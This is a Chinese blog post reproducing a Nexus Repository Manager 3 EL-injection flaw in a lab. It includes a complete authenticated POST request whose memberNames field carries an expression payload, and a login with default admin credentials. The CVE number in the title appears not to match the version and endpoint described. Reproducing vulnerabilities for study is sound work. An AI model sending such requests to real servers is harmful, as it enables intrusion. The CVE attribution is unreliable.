漏洞浮現(xiàn)-Nexus Repository Manager 3 遠程命令執(zhí)行漏洞(CVE-2019-7238)

Nexus Repository Manager 3 遠程命令執(zhí)行漏洞(CVE-2019-7238)

Nexus Repository Manager 3 是一款軟件倉庫,可以用來存儲和分發(fā)Maven、NuGET等軟件源倉庫。其3.21.1及之前版本中,存在一處任意EL表達式注入漏洞。

環(huán)境搭建

image.png

訪問:http://ip:8081
image.png

該漏洞需要至少普通用戶身份,所以我們需要使用賬號密碼admin:admin登錄后臺。
image.png

登錄后,復制當前Cookie和CSRF Token
image.png

構造數(shù)據(jù)包

POST /service/rest/beta/repositories/go/group HTTP/1.1
Host: 127.0.0.1:8081
Content-Length: 203
X-Requested-With: XMLHttpRequest
X-Nexus-UI: true
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
NX-ANTI-CSRF-TOKEN: 0.7886248393834028
Content-Type: application/json
Accept: */*
Origin: http://127.0.0.1:8081
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Referer: http://127.0.0.1:8081/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: NX-ANTI-CSRF-TOKEN=0.7886248393834028; NXSESSIONID=cedf848f-d881-4b58-ac24-9e9c3ece40bc
Connection: close

{
  "name": "internal",
  "online": true,
  "storage": {
    "blobStoreName": "default",
    "strictContentTypeValidation": true
  },
  "group": {
    "memberNames": ["$\\A{233*233*233}"]
  }
}

將以上得ip和token替換成自己數(shù)據(jù)包的值轉發(fā)。


image.png

可以發(fā)現(xiàn)EL表達式被成功過執(zhí)行。

?著作權歸作者所有,轉載或內容合作請聯(lián)系作者
【社區(qū)內容提示】社區(qū)部分內容疑似由AI輔助生成,瀏覽時請結合常識與多方信息審慎甄別。
平臺聲明:文章內容(如有圖片或視頻亦包括在內)由作者上傳并發(fā)布,文章內容僅代表作者本人觀點,簡書系信息發(fā)布平臺,僅提供信息存儲服務。

友情鏈接更多精彩內容